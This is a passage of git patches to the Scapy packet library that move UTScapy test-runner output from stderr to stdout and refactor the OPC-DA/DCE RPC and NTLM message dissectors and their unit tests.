config_file: data = json.load(config_file) if verb > 2: - print(" %s Loaded config file" % arrow, config_path, file=sys.stderr) + print(" %s Loaded config file" % arrow, config_path) def get_if_exist(key, default): return data[key] if key in data else default @@ -335,7 +335,7 @@ def get_if_exist(key, default): docs=get_if_exist("docs", 0), preexec=get_if_exist("preexec", {}), global_preexec=get_if_exist("global_preexec", ""), - outfile=get_if_exist("outputfile", sys.stderr), + outfile=get_if_exist("outputfile", sys.stdout), local=get_if_exist("local", False), num=get_if_exist("num", None), modules=get_if_exist("modules", []), @@ -535,9 +535,9 @@ def run_test(test, get_interactive_session, theme, verb=3, debug.crashed_on = None test.prepare(theme) if verb > 2: - print("%(fresult)6s %(crc)s %(duration)06.2fs %(name)s" % test, file=sys.stderr) + print("%(fresult)6s %(crc)s %(duration)06.2fs %(name)s" % test) elif verb > 1: - print("%(fresult)6s %(crc)s %(name)s" % test, file=sys.stderr) + print("%(fresult)6s %(crc)s %(name)s" % test) return bool(test) @@ -590,7 +590,7 @@ def drop(scapy_ses): test_campaign.trunc(i + 1) test_campaign.interrupted = True if verb: - print("Campaign interrupted!", file=sys.stderr) + print("Campaign interrupted!") if drop_to_interpreter: drop(scapy_ses) @@ -598,13 +598,11 @@ def drop(scapy_ses): test_campaign.failed = failed style = [theme.success, theme.fail][bool(failed)] if verb > 2: - print("Campaign CRC=%(crc)s in %(duration)06.2fs SHA=%(sha)s" % test_campaign, file=sys.stderr) # noqa: E501 - print(style("PASSED=%i FAILED=%i" % (passed, failed)), - file=sys.stderr) + print("Campaign CRC=%(crc)s in %(duration)06.2fs SHA=%(sha)s" % test_campaign) + print(style("PASSED=%i FAILED=%i" % (passed, failed))) elif verb: - print("Campaign CRC=%(crc)s SHA=%(sha)s" % test_campaign, file=sys.stderr) # noqa: E501 - print(style("PASSED=%i FAILED=%i" % (passed, failed)), - file=sys.stderr) + print("Campaign CRC=%(crc)s SHA=%(sha)s" % test_campaign) + print(style("PASSED=%i FAILED=%i" % (passed, failed))) return failed @@ -824,7 +822,7 @@ def usage(): -k ,,...\t: include only tests with one of those keywords (can be used many times) -K ,,...\t: remove tests with one of those keywords (can be used many times) -P -""", file=sys.stderr) +""") raise SystemExit @@ -838,8 +836,9 @@ def execute_campaign(TESTFILE, OUTPUTFILE, PREEXEC, NUM, KW_OK, KW_KO, DUMP, DOC try: test_campaign = parse_campaign_file(TESTFILE) except ValueError as ex: - print(theme.red("Error while parsing '%s': '%s'" % (TESTFILE.name, ex)), - file=sys.stderr) + print( + theme.red("Error while parsing '%s': '%s'" % (TESTFILE.name, ex)) + ) sys.exit(1) # Report parameters @@ -923,12 +922,12 @@ def main(): import scapy print(dash + " UTScapy - Scapy %s - %s" % ( scapy.__version__, sys.version.split(" ")[0] - ), file=sys.stderr) + )) # Parse arguments FORMAT = Format.ANSI - OUTPUTFILE = sys.stderr + OUTPUTFILE = sys.stdout LOCAL = 0 NUM = None NON_ROOT = False @@ -1032,7 +1031,7 @@ def main(): KW_KO.extend(optarg.split(",")) except getopt.GetoptError as msg: - print("ERROR:", msg, file=sys.stderr) + print("ERROR:", msg) raise SystemExit if FORMAT in [Format.LIVE, Format.ANSI]: @@ -1046,21 +1045,21 @@ def main(): if six.PY2: KW_KO.append("python3_only") if VERB > 2: - print(" " + arrow + " Python 2 mode", file=sys.stderr) + print(" " + arrow + " Python 2 mode") try: if NON_ROOT or os.getuid() != 0: # Non root # Discard root tests KW_KO.append("netaccess") KW_KO.append("needs_root") if VERB > 2: - print(" " + arrow + " Non-root mode", file=sys.stderr) + print(" " + arrow + " Non-root mode") except AttributeError: pass if conf.use_pcap: KW_KO.append("not_pcapdnet") if VERB > 2: - print(" " + arrow + " libpcap mode", file=sys.stderr) + print(" " + arrow + " libpcap mode") KW_KO.append("disabled") @@ -1077,11 +1076,11 @@ def main(): collect_types.start() if VERB > 2: - print(" " + arrow + " Booting scapy...", file=sys.stderr) + print(" " + arrow + " Booting scapy...") try: from scapy import all as scapy except Exception as e: - print("[CRITICAL]: Cannot import Scapy: %s" % e, file=sys.stderr) + print("[CRITICAL]: Cannot import Scapy: %s" % e) traceback.print_exc() sys.exit(1) # Abort the tests @@ -1105,7 +1104,7 @@ def main(): } if VERB > 2: - print(" " + arrow + " Discovering tests files...", file=sys.stderr) + print(" " + arrow + " Discovering tests files...") glob_output = "" glob_result = 0 @@ -1132,7 +1131,7 @@ def main(): # Execute all files for TESTFILE in TESTFILES: if VERB > 2: - print(theme.green(dash + " Loading: %s" % TESTFILE), file=sys.stderr) + print(theme.green(dash + " Loading: %s" % TESTFILE)) PREEXEC = PREEXEC_DICT[TESTFILE] if TESTFILE in PREEXEC_DICT else GLOB_PREEXEC with open(TESTFILE) as testfile: output, result, campaign = execute_campaign( @@ -1155,8 +1154,7 @@ def main(): if VERB > 2: print( - checkmark + " All campaigns executed. Writing output...", - file=sys.stderr + checkmark + " All campaigns executed. Writing output..." ) if ANNOTATIONS_MODE: @@ -1170,7 +1168,7 @@ def main(): # Write the final output # Note: on Python 2, we force-encode to ignore ascii errors # on Python 3, we need to detect the type of stream - if OUTPUTFILE == sys.stderr: + if OUTPUTFILE == sys.stdout: print(glob_output, file=OUTPUTFILE) else: with open(OUTPUTFILE, "wb") as f: @@ -1183,17 +1181,16 @@ def main(): # Print end message if VERB > 2: if glob_result == 0: - print(theme.green("UTscapy ended successfully"), file=sys.stderr) + print(theme.green("UTscapy ended successfully")) else: - print(theme.red("UTscapy ended with error code %s" % glob_result), - file=sys.stderr) + print(theme.red("UTscapy ended with error code %s" % glob_result)) # Check active threads if VERB > 2: import threading if threading.active_count() > 1: - print("\nWARNING: UNFINISHED THREADS", file=sys.stderr) - print(threading.enumerate(), file=sys.stderr) + print("\nWARNING: UNFINISHED THREADS") + print(threading.enumerate()) # Return state return glob_result @@ -1205,7 +1202,7 @@ def main(): warnings.resetwarnings() # Let's discover the garbage waste warnings.simplefilter('error') - print("### Warning mode enabled ###", file=sys.stderr) + print("### Warning mode enabled ###") res = main() if cw: res = 1 From 7c551510532701ea484939cea60c2d94552966fa Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 11 Dec 2020 14:51:12 +0100 Subject: [PATCH 0469/1632] OPC-DA: reduce duplication --- scapy/contrib/opc_da.py | 506 +++++++++------------------------------- scapy/fields.py | 6 +- 2 files changed, 109 insertions(+), 403 deletions(-) diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index 6d064601c57..df1314dc504 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -34,15 +34,40 @@ DCOM Remote Protocol. References: Specifies Distributed Component Object Model (DCOM) Remote Protocol Using the website: https://msdn.microsoft.com/en-us/library/cc226801.aspx + +NT LAN Manager (NTLM) Authentication Protocol +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 """ from scapy.config import conf -from scapy.fields import Field, ByteField, ShortField, LEShortField, \ - IntField, LEIntField, LongField, LELongField, StrField, StrLenField, \ - StrFixedLenField, BitEnumField, ByteEnumField, ShortEnumField, \ - LEShortEnumField, IntEnumField, LEIntEnumField, FieldLenField, \ - LEFieldLenField, PacketField, PacketListField, PacketLenField, \ - ConditionalField, FlagsField, UUIDField +from scapy.fields import ( + BitEnumField, + ByteEnumField, + ByteField, + ConditionalField, + Field, + FieldLenField, + FlagsField, + IntEnumField, + IntField, + LEIntEnumField, + LEIntField, + LELongField, + LEShortEnumField, + LEShortField, + LongField, + PacketField, + PacketLenField, + PacketListField, + ShortEnumField, + ShortField, + StrField, + StrFixedLenField, + StrLenField, + UUIDField, + _FieldContainer, + _PacketField, +) from scapy.packet import Packet # Defined values @@ -233,6 +258,30 @@ 1: 'OsfDcePrivateKeyAuthentication', } +# Util + + +def _make_le(pkt_cls): + """ + Make all fields in a packet LE. + """ + flds = [f.copy() for f in pkt_cls.fields_desc] + for f in flds: + if isinstance(f, _FieldContainer): + f = f.fld + if isinstance(f, UUIDField): + f.uuid_fmt = UUIDField.FORMAT_LE + elif isinstance(f, _PacketField): + f.cls = globals().get(f.cls.__name__ + "LE", f.cls) + elif not isinstance(f, StrField): + f.fmt = "<" + f.fmt.replace(">", "").replace("!", "") + + class LEPacket(pkt_cls): + fields_desc = flds + name = pkt_cls().name + " (LE)" + LEPacket.__name__ = pkt_cls.__name__ + "LE" + return LEPacket + # Sub class for dissection class AuthentificationProtocol(Packet): @@ -284,20 +333,7 @@ def extract_padding(self, p): return b"", p -class LenStringPacketLE(Packet): - name = "len string packet" - fields_desc = [ - LEFieldLenField('length', 0, length_of='data', fmt=" str - return "" % (",".join(x.__name__ for x in self.owners), self.name) # noqa: E501 + return "<%s (%s).%s>" % ( + self.__class__.__name__, + ",".join(x.__name__ for x in self.owners), + self.name + ) def copy(self): # type: () -> Field[I, M] From cf0c4a105cc004c3e9dfcc68d5ff5fff30bbc4ea Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 11 Dec 2020 15:32:01 +0100 Subject: [PATCH 0470/1632] Cleanup this nonsense --- scapy/contrib/opc_da.py | 241 +++++++++++++++++++++++----------------- test/contrib/opc_da.uts | 26 ++--- 2 files changed, 154 insertions(+), 113 deletions(-) diff --git a/scapy/contrib/opc_da.py b/scapy/contrib/opc_da.py index df1314dc504..469a199ee34 100644 --- a/scapy/contrib/opc_da.py +++ b/scapy/contrib/opc_da.py @@ -27,18 +27,25 @@ # scapy.contrib.status = loads """ -Opc Data Access. -References: Data Access Custom Interface StanDard -Using the website: http://pubs.opengroup.org/onlinepubs/9629399/chap12.htm +Opc Data Access + +Spec: Google 'OPCDA3.00.pdf' + +RPC PDU encodings: +- DCE 1.1 RPC: https://pubs.opengroup.org/onlinepubs/9629399/toc.pdf +- http://pubs.opengroup.org/onlinepubs/9629399/chap12.htm DCOM Remote Protocol. -References: Specifies Distributed Component Object Model (DCOM) Remote Protocol -Using the website: https://msdn.microsoft.com/en-us/library/cc226801.aspx +[MS-DCOM]: Distributed Component Object Model (DCOM) Remote Protocol +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-dcom/4a893f3d-bd29-48cd-9f43-d9777a4415b0 +XXX TODO: does not appear to have been linked to RPC NT LAN Manager (NTLM) Authentication Protocol https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 """ +import struct + from scapy.config import conf from scapy.fields import ( BitEnumField, @@ -53,9 +60,8 @@ LEIntEnumField, LEIntField, LELongField, - LEShortEnumField, LEShortField, - LongField, + MultipleTypeField, PacketField, PacketLenField, PacketListField, @@ -64,6 +70,7 @@ StrField, StrFixedLenField, StrLenField, + ThreeBytesField, UUIDField, _FieldContainer, _PacketField, @@ -275,6 +282,7 @@ def _make_le(pkt_cls): f.cls = globals().get(f.cls.__name__ + "LE", f.cls) elif not isinstance(f, StrField): f.fmt = "<" + f.fmt.replace(">", "").replace("!", "") + f.struct = struct.Struct(f.fmt) class LEPacket(pkt_cls): fields_desc = flds @@ -291,11 +299,11 @@ def extract_padding(self, p): return b"", p def guess_payload_class(self, payload): - if self.underlayer and hasattr(self.underlayer, "auth_length"): - auth_length = self.underlayer.auth_length - if auth_length != 0: + if self.underlayer and hasattr(self.underlayer, "authLength"): + authLength = self.underlayer.authLength + if authLength != 0: try: - return _authentification_protocol[auth_length] + return _authentification_protocol[authLength] except Exception: pass return conf.raw_layer @@ -318,15 +326,15 @@ def extract_padding(self, p): class LenStringPacket(Packet): + # Among other things, can be (port_any_t - DCE 1.1 RPC - p592) name = "len string packet" fields_desc = [ FieldLenField('length', 0, length_of='data', fmt="H"), - ConditionalField(StrLenField('data', None, - length_from=lambda pkt:pkt.length + 2), - lambda pkt:pkt.length == 0), - ConditionalField(StrLenField('data', '', - length_from=lambda pkt:pkt.length), - lambda pkt:pkt.length != 0), + MultipleTypeField( + [(StrFixedLenField('data', '', length=2), + lambda pkt: not pkt.length)], + StrLenField('data', '', length_from=lambda pkt: pkt.length) + ) ] def extract_padding(self, p): @@ -353,10 +361,11 @@ def extract_padding(self, p): class ResultElement(Packet): - name = "result" + # p_result_list_t - DCE 1.1 RPC - p591 + name = "p_result_t" fields_desc = [ ShortEnumField('resultContextNegotiation', 0, _defResult), - ConditionalField(LEShortEnumField('reason', 0, _defReason), + ConditionalField(ShortEnumField('reason', 0, _defReason), lambda pkt:pkt.resultContextNegotiation != 0), PacketField('transferSyntax', '\x00' * 20, SyntaxId), ] @@ -369,7 +378,8 @@ def extract_padding(self, p): class ResultList(Packet): - name = "list result" + # p_result_list_t - DCE 1.1 RPC - p592 + name = "p_result_list_t" fields_desc = [ ByteField('nbResult', 0), ByteField('reserved', 0), @@ -510,7 +520,9 @@ class IRemoteSCMActivator_RemoteCreateInstance(Packet): def guess_payload_class(self, payload): try: - return _objref_pdu[self.flag][self.__name__.endswith("LE")] + return _objref_pdu[self.flag][ + self.__class__.__name__.endswith("LE") + ] except Exception: pass @@ -574,7 +586,7 @@ def guess_payload_class(self, payload): } -# Not in the official Documentation +# [MS-NLMP] 2.2.2.1 _attribute_type = { 0: 'EndOfList', 1: 'NetBIOSComputerName', @@ -625,84 +637,74 @@ def guess_payload_class(self, payload): ] -class AttributeName(Packet): - name = "Attribute" +class AV_PAIR(Packet): + name = "AV_PAIR" fields_desc = [ - ShortEnumField('attributeItemType', 2, _attribute_type), - ShortField('attributeItemLen', 0), - StrLenField('attributeItem', '', - length_from=lambda pkt:pkt.responseItemLen), + ShortEnumField('avID', 2, _attribute_type), + ShortField('avLen', 0), + StrLenField('value', '', + length_from=lambda pkt:pkt.avLen), ] def extract_padding(self, p): return b"", p -AttributeNameLE = _make_le(AttributeName) +AV_PAIRLE = _make_le(AV_PAIR) class NTLMSSP(Packet): - # [MS-NLMP] v16.2 sect 2.2.1.3 AUTHENTICATE_MESSAGE - name = 'NTLM Secure Service Provider' + # [MS-NLMP] v16.2 sect 2.2.1 + name = 'NTLM Authentication Protocol' deprecated_fields_desc = { 'identifier': ('signature', '2.5.0'), } fields_desc = [ - StrFixedLenField('signature', 'NTLMSSP', length=8), - IntEnumField('messageType', 3, {3: 'NTLMSSP_AUTH'}), - ShortField('lanManagerLen', 0), - ShortField('lanManagerMax', 0), - ShortField('lanManagerOffset', 0), - ShortField('NTLMRepLen', 0), - ShortField('NTLMRepMax', 0), - IntField('NTLMRepOffset', 0), + StrFixedLenField('signature', b'NTLMSSP\0', length=8), + IntEnumField('messageType', 3, {1: 'NEGOTIATE_MESSAGE', + 2: 'CHALLENGE_MESSAGE', + 3: 'AUTHENTICATE_MESSAGE'}), + # TODO: ONLY AUTHENTICATE_MESSAGE IMPLEMENTED + # sect 2.2.1.3 + ShortField('lmChallengeResponseLen', 0), + ShortField('lmChallengeResponseMaxLen', 0), + IntField('lmChallengeResponseBufferOffset', 0), + ShortField('ntChallengeResponseLen', 0), + ShortField('ntChallengeResponseMaxLen', 0), + IntField('ntChallengeResponseBufferOffset', 0), ShortField('domainNameLen', 0), ShortField('domainNameMax', 0), IntField('domainNameOffset', 0), ShortField('userNameLen', 0), ShortField('userNameMax', 0), IntField('userNameOffset', 0), - ShortField('hostNameLen', 0), - ShortField('hostNameMax', 0), - IntField('hostNameOffset', 0), - ShortField('sessionKeyLen', 0), - ShortField('sessionKeyMax', 0), - IntField('sessionKeyOffset', 0), + ShortField('workstationLen', 0), + ShortField('workstationMaxLen', 0), + IntField('workstationBufferOffset', 0), + ShortField('encryptedRandomSessionKeyLen', 0), + ShortField('encryptedRandomSessionKeyMaxLen', 0), + IntField('encryptedRandomSessionKeyBufferOffset', 0), FlagsField('negociateFlags', 0, 32, _negociate_flags), - ByteField('versionMajor', 0), - ByteField('versionMinor', 0), - ShortField('buildNumber', 0), - ByteField('reserved', 0), - ShortField('reserved2', 0), - ByteField('NTLMCurrentRevision', 0), + ByteField('productMajorVersion', 0), + ByteField('productMinorVersion', 0), + ShortField('productBuild', 0), + ThreeBytesField('reserved', 0), + ByteField('NTLMRevisionCurrent', 0), StrFixedLenField('MIC', '', 16), + # payload field. + # TODO: those challenges are structures that should be defined + StrLenField('lmChallengeResponse', '', + length_from=lambda pkt: pkt.lmChallengeResponseLen), + StrLenField('ntChallengeResponse', '', + length_from=lambda pkt: pkt.ntChallengeResponseLen), StrLenField('domainName', '', length_from=lambda pkt: pkt.domainNameLen), - StrLenField('userName', '', length_from=lambda pkt: pkt.userNameLen), - StrLenField('hostName', '', length_from=lambda pkt: pkt.hostNameLen), - StrLenField('lanManager', '', - length_from=lambda pkt: pkt.lanManagerLen), - StrLenField('NTLMRep', '', length_from=lambda pkt: pkt.NTLMRepLen), - ByteField('responseVersion', 0), - ByteField('hiResponseVersion', 0), - StrFixedLenField('Z', '', 6), - LongField('timestamp', 0), # Time in nanoseconde - StrFixedLenField('clientChallenge', '', 8), - IntField('Z', 0), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - PacketField('attributeNTLMV2', None, AttributeName), - IntField('Z', 0), - IntField('padding', 0), - StrLenField('sessionKey', '', - length_from=lambda pkt: pkt.sessionKeyLen), + StrLenField('userName', '', + length_from=lambda pkt: pkt.userNameLen), + StrLenField('workstation', '', + length_from=lambda pkt: pkt.workstationLen), + StrLenField('encryptedRandomSessionKey', '', + length_from=lambda pkt: pkt.encryptedRandomSessionKeyLen) ] def extract_padding(self, p): @@ -731,7 +733,7 @@ class OpcDaAuth3(Packet): def guess_payload_class(self, payload): try: return _opcDa_auth_classes[self.authType][ - self.__name__.endswith("LE") + self.__class__.__name__.endswith("LE") ] except Exception: pass @@ -746,33 +748,46 @@ def guess_payload_class(self, payload): # numbers. The body of a request PDU contains data that represents input # parameters for the operation. -class RequestSubData(Packet): - name = 'RequestSubData' +class RequestStubData(Packet): + name = 'RequestStubData' fields_desc = [ ShortField('versionMajor', 0), ShortField('versionMinor', 0), - IntField('flags', 0), - IntField('reserved', 0), - UUIDField('subUuid', str('0001' * 8), uuid_fmt=UUIDField.FORMAT_BE), - StrField('subdata', ''), + StrField('stubdata', ''), ] def extract_padding(self, p): return b"", p -RequestSubDataLE = _make_le(RequestSubData) +RequestStubDataLE = _make_le(RequestStubData) + + +def _opc_stubdata_length(pkt): + if not pkt.underlayer or not isinstance(pkt.underlayer, OpcDaHeaderN): + return 0 + stub_data_length = pkt.underlayer.fragLength - 24 + stub_data_length -= pkt.underlayer.authLength + if (OpcDaHeaderMessage in pkt.firstlayer() and + pkt.firstlayer()[OpcDaHeaderMessage].pfc_flags & 'objectUuid'): + stub_data_length -= 36 + return max(0, stub_data_length) class OpcDaRequest(Packet): + # DCE 1.1 RPC - 12.6.4.9 name = "OpcDaRequest" fields_desc = [ IntField('allocHint', 0), ShortField('contextId', 0), ShortField('opNum', 0), - UUIDField('uuid', str('0001' * 8), uuid_fmt=UUIDField.FORMAT_BE), - PacketLenField('subData', None, RequestSubData, - length_from=lambda pkt:pkt.allocHint), + ConditionalField( + UUIDField('uuid', str('0001' * 8), uuid_fmt=UUIDField.FORMAT_BE), + lambda pkt: OpcDaHeaderMessage in pkt.firstlayer() and + pkt.firstlayer()[OpcDaHeaderMessage].pfc_flags & 'objectUuid' + ), + PacketLenField('stubData', None, RequestStubData, + length_from=lambda pkt: _opc_stubdata_length(pkt)), PacketField('authentication', None, AuthentificationProtocol), ] @@ -787,6 +802,7 @@ def extract_padding(self, p): # request. # A ping PDU contains no body data. class OpcDaPing(Packet): + # DCE 1.1 RPC - 12.5.3.7 name = "OpcDaPing" fields_desc = [] @@ -800,13 +816,14 @@ def extract_padding(self, p): # consists of a series of response PDUs with the same sequence number and # monotonically increasing fragment numbers. class OpcDaResponse(Packet): + # DCE 1.1 RPC - 12.6.4.10 name = "OpcDaResponse" fields_desc = [ IntField('allocHint', 0), ShortField('contextId', 0), ByteField('cancelCount', 0), ByteField('reserved', 0), - StrLenField('subData', None, + StrLenField('stubData', None, length_from=lambda pkt:pkt.allocHint - 32), PacketField('authentication', None, AuthentificationProtocol), ] @@ -820,8 +837,9 @@ def extract_padding(self, p): # The fault PDU is used to indicate either an RPC run-time, RPC stub, or # RPC-specific exception to the client. -# Length of the subdata egal allochint less header +# Length of the stubdata egal allochint less header class OpcDaFault(Packet): + # DCE 1.1 RPC - 12.6.4.7 name = "OpcDaFault" fields_desc = [ IntField('allocHint', 0), @@ -830,8 +848,9 @@ class OpcDaFault(Packet): ByteField('reserved', 0), IntEnumField('Group', 0, _faultStatus), IntField('reserved2', 0), - StrLenField('subData', None, + StrLenField('stubData', None, length_from=lambda pkt:pkt.allocHint - 32), + PacketField('authentication', None, AuthentificationProtocol), ] def extract_padding(self, p): @@ -871,6 +890,7 @@ def extract_padding(self, p): # a reject PDU contains a status code indicating why a callee is rejecting # a request PDU from a caller. class OpcDaReject(Packet): + # DCE 1.1 RPC - 12.5.3.8 name = "OpcDaReject" fields_desc = [ IntField('allocHint', 0), @@ -878,7 +898,7 @@ class OpcDaReject(Packet): ByteField('cancelCount', 0), ByteField('reserved', 0), IntEnumField('Group', 0, _rejectStatus), - StrLenField('subData', None, + StrLenField('stubData', None, length_from=lambda pkt:pkt.allocHint - 32), PacketField('authentication', None, AuthentificationProtocol), ] @@ -905,6 +925,7 @@ def extract_padding(self, p): # The cancel PDU is used to forward a cancel. class OpcDaCl_cancel(Packet): + # DCE 1.1 RPC - 12.5.3.3 name = "OpcDaCl_cancel" fields_desc = [ PacketField('authentication', None, AuthentificationProtocol), @@ -927,6 +948,7 @@ def extract_padding(self, p): # request. A fack PDU explicitly acknowledges that the server has received the # fragment; it may tell the sender to stop sending for a while. class OpcDaFack(Packet): + # DCE 1.1 RPC - 12.5.3.4 name = "OpcDaFack" fields_desc = [ ShortField('version', 0), @@ -958,6 +980,7 @@ def extract_padding(self, p): # call. The run-time system's processing of a cancelled call continues # uninterrupted. class OpcDaCancel_ack(Packet): + # DCE 1.1 RPC - 12.5.3.2 name = "OpcDaCancel_ack" fields_desc = [ IntField('version', 0), @@ -976,6 +999,7 @@ def extract_padding(self, p): # data, and optionally, authentication. The presentation negotiation follows # the model of the OSI presentation layer. class OpcDaBind(Packet): + # DCE 1.1 RPC - 12.6.4.3 name = "OpcDaBind" fields_desc = [ ShortField('maxXmitFrag', 5840), @@ -1001,13 +1025,14 @@ def extract_padding(self, p): # context and fragment size negotiations. It may also contain a new # association group identifier if one was requested by the client. class OpcDaBind_ack(Packet): + # DCE 1.1 RPC - 12.6.4.4 name = "OpcDaBind_ack" fields_desc = [ ShortField('maxXmitFrag', 5840), ShortField('maxRecvtFrag', 5840), IntField('assocGroupId', 0), PacketField('portSpec', '\x00\x00\x00\x00', LenStringPacket), - IntField('pda2', 0), + IntField('pad2', 0), PacketField('resultList', None, ResultList), PacketField('authentication', None, AuthentificationProtocol), ] @@ -1025,6 +1050,7 @@ def extract_padding(self, p): # protocol_version_not_supported, the versions field contains a list of # run-time protocol versions supported by the server. class OpcDaBind_nak(Packet): + # DCE 1.1 RPC - 12.6.4.5 name = "OpcDaBind_nak" fields_desc = [ ShortEnumField("providerRejectReason", 0, _rejectBindNack) @@ -1041,6 +1067,7 @@ def extract_padding(self, p): # for another interface and/or version, or to negotiate a new security # context, or both. class OpcDaAlter_context(Packet): + # DCE 1.1 RPC - 12.6.4.1 name = "OpcDaAlter_context" fields_desc = [ ShortField('maxXmitFrag', 5840), @@ -1057,14 +1084,16 @@ def extract_padding(self, p): class OpcDaAlter_Context_Resp(Packet): + # DCE 1.1 RPC - 12.6.4.2 name = "OpcDaAlter_Context_Resp" fields_desc = [ ShortField('maxXmitFrag', 5840), ShortField('maxRecvtFrag', 5840), IntField('assocGroupId', 0), - PacketField('portSPec', '\x00\x00\x00\x00', LenStringPacket), - LEIntField('numResult', 0), - # PacketField('authentication', None, AuthentificationProtocol), + PacketField('portSpec', '\x00\x00\x00\x00', LenStringPacket), + IntField('pad2', 0), + PacketField('resultList', None, ResultList), + PacketField('authentication', None, AuthentificationProtocol), ] # To complete def extract_padding(self, p): @@ -1079,6 +1108,7 @@ def extract_padding(self, p): # The shutdown PDU never contains an authentication verifier even if # authentication services are in use. class OpcDaShutdown(Packet): + # DCE 1.1 RPC - 12.6.4.11 name = "OpcDaShutdown" def extract_padding(self, p): @@ -1087,6 +1117,7 @@ def extract_padding(self, p): # The cancel PDU is used to forward a cancel. class OpcDaCo_cancel(Packet): + # DCE 1.1 RPC - 12.5.3.3 name = "OpcDaCO_cancel" fields_desc = [ PacketField('authentication', None, AuthentificationProtocol), @@ -1108,6 +1139,7 @@ class OpcDaOrphaned(AuthentificationProtocol): name = "OpcDaOrphaned" +# DCE 1.1 RPC sect 12 _opcDa_pdu_classes = { 0: [OpcDaRequest, OpcDaRequestLE], 1: [OpcDaPing, OpcDaPing], @@ -1118,11 +1150,11 @@ class OpcDaOrphaned(AuthentificationProtocol): 6: [OpcDaReject, OpcDaRejectLE], 7: [OpcDaAck, OpcDaAck], 8: [OpcDaCl_cancel, OpcDaCl_cancelLE], - 9: [OpcDaFack, OpcDaFack], + 9: [OpcDaFack, OpcDaFackLE], 10: [OpcDaCancel_ack, OpcDaCancel_ackLE], 11: [OpcDaBind, OpcDaBindLE], 12: [OpcDaBind_ack, OpcDaBind_ackLE], - 13: [OpcDaBind_nak, OpcDaBind_nak], + 13: [OpcDaBind_nak, OpcDaBind_nakLE], 14: [OpcDaAlter_context, OpcDaAlter_contextLE], 15: [OpcDaAlter_Context_Resp, OpcDaAlter_Context_RespLE], 17: [OpcDaShutdown, OpcDaShutdown], @@ -1134,17 +1166,20 @@ class OpcDaOrphaned(AuthentificationProtocol): class OpcDaHeaderN(Packet): + # Last 3 fields of the common fields, used for dispatching the PDUs name = "OpcDaHeaderNext" fields_desc = [ - ShortField('fragLenght', 0), - ShortEnumField('authLenght', 0, _authentification_protocol), + ShortField('fragLength', 0), + ShortEnumField('authLength', 0, _authentification_protocol), IntField('callID', 0) ] def guess_payload_class(self, payload): if self.underlayer: try: - return _opcDa_pdu_classes[self.underlayer.pdu_type][1] + return _opcDa_pdu_classes[self.underlayer.pduType][ + self.__class__.__name__.endswith("LE") + ] except AttributeError: pass return conf.raw_layer @@ -1160,13 +1195,19 @@ def guess_payload_class(self, payload): class OpcDaHeaderMessage(Packet): + # An actual RPC PDU + # DCE 1.1 RPC - 12.6.3.1 name = "OpcDaHeader" + deprecated_fields = { + "pdu_type": ("pduType", "2.5.0"), + } fields_desc = [ ByteField('versionMajor', 0), ByteField('versionMinor', 0), ByteEnumField("pduType", 0, _pduType), FlagsField('pfc_flags', 0, 8, _pfc_flags), # Non-Delivery Report/Receipt (NDR) Format Label + # DCE 1.1 RPC - 14.1 BitEnumField('integerRepresentation', 1, 4, {0: "bigEndian", 1: "littleEndian"}), BitEnumField('characterRepresentation', 0, 4, diff --git a/test/contrib/opc_da.uts b/test/contrib/opc_da.uts index 89c0916482e..1d3b3ce35e5 100644 --- a/test/contrib/opc_da.uts +++ b/test/contrib/opc_da.uts @@ -9,10 +9,10 @@ opcdaRequestPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=0, \ pfc_flags = 131,integerRepresentation='bigEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderN(fragLenght=100,authLenght=0,callID=21)\ + res=0)/ OpcDaHeaderN(fragLength=100,authLength=0,callID=21)\ / OpcDaRequest(allocHint=60,contextId=6,opNum=5,\ - uuid=b'0000c41d-0a9c-0000-d702-8c761299f7bf',subData=RequestSubData(\ - versionMajor=0,versionMinor=0,subdata=''))) + uuid=b'0000c41d-0a9c-0000-d702-8c761299f7bf',stubData=RequestStubData(\ + versionMajor=0,versionMinor=0,stubdata=''))) elem2 = raw(opcdaRequestPacket_Build) assert( elem1 == elem2 ) @@ -25,11 +25,11 @@ opcdaRequestLEPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=0, \ pfc_flags = 131,integerRepresentation='littleEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderNLE(fragLenght=100,authLenght=0,callID=21)\ + res=0)/ OpcDaHeaderNLE(fragLength=100,authLength=0,callID=21)\ / OpcDaRequestLE (allocHint=60,contextId=6,opNum=5,\ uuid=b'0000c41d-0a9c-0000-d702-8c761299f7bf',\ - subData=RequestSubDataLE(versionMajor=0,versionMinor=0,flags=0,reserved=0,\ - subUuid=b'344e2d51-43ab-4914-a2cf-7784b21b3ea1',subdata=''))) + stubData=RequestStubDataLE(versionMajor=0,versionMinor=0,\ + stubdata=b'\x00\x00\x00\x00\x00\x00\x00\x00Q-N4\xabC\x14I\xa2\xcfw\x84\xb2\x1b>\xa1'))) elem2 = raw(opcdaRequestLEPacket_Build) assert( elem1 == elem2 ) @@ -44,7 +44,7 @@ opcdaPingPacket_Build = OpcDaMessage(OpcDaMessage= \ OpcDaHeaderMessage (versionMajor=5,versionMinor=0,pduType=1, \ pfc_flags = 3,integerRepresentation='littleEndian',\ characterRepresentation='ascii',floatingPointRepresentation='ieee',\ - reservedForFutur=0)/ OpcDaHeaderNLE(fragLenght=100,authLenght=0,callID=21)\ + res=0)/ OpcDaHeaderNLE(fragLength=100,authLength=0,callID=21)\ / OpcDaPing()) / '\x00' 